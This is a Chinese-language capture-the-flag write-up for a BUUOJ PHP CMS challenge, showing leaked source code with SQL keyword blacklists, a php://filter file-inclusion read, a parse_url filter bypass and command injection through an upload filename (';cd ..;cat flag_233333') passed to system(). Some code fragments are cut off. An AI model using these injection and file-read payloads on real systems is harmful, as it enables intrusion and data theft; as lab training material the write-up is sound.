一个cms,先打开环境
试了一下弱口令,无效,再试一下万能密码,告诉我有waf,先不想怎么绕过,直接开扫(信息收集)
访问register.php注册一个账号进行登录
上面的链接尝试用php读文件
http://575579bc-af3b-4fa5-b93d-9062dfb85a31.node4.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=index
index.php
register.php
function.php
$v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
// var_dump($res);
// die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>
config.php
hacker.php
user.php
alert('no premission to visit info, only admin can, you are guest')");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
// $page = 'info';
//}
include "$page.php";
?>
login.php
error_parameter.php
到此为止,把能读的源码全读了,开始代码分析
看到有parse_url函数,可能存在漏洞
利用该漏洞的payload
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
继续读取m4aaannngggeee(后续有用)
访问
http://xxxd1.no.buoj.cn:81/templates/upload.html
发现一个上传界面,随机上传一个文件,显示错误,看到upllloadddd,读它源码
upllloadddd.php(该界面访问报错,不是真正的上传界面)
";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>
m4aaannngggeee(上面代码可以看出是上传界面)
http://xxx.nod4.bj.cn:81/user.php?page=m4aaannngggeee
然而这个上传界面没啥用,上传上去的代码被base64编码,无法解析
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename."
可以看到这一行有一个system函数,我们可以对filename传参利用
打开bp抓包,对filename进行操作
payload为
;l's'
发现传回的值明显多于原图片内容base64后的结果
解码查看内容
发现此为命令执行后的结果,找寻flag,查看上级目录
payload
;cd ..;l's'
读取flag_233333
payload
;cd ..;cat flag_233333
找到flag值
flag{44794dcf-7ec4-4dd2-8f68-c6ad9219f0ef}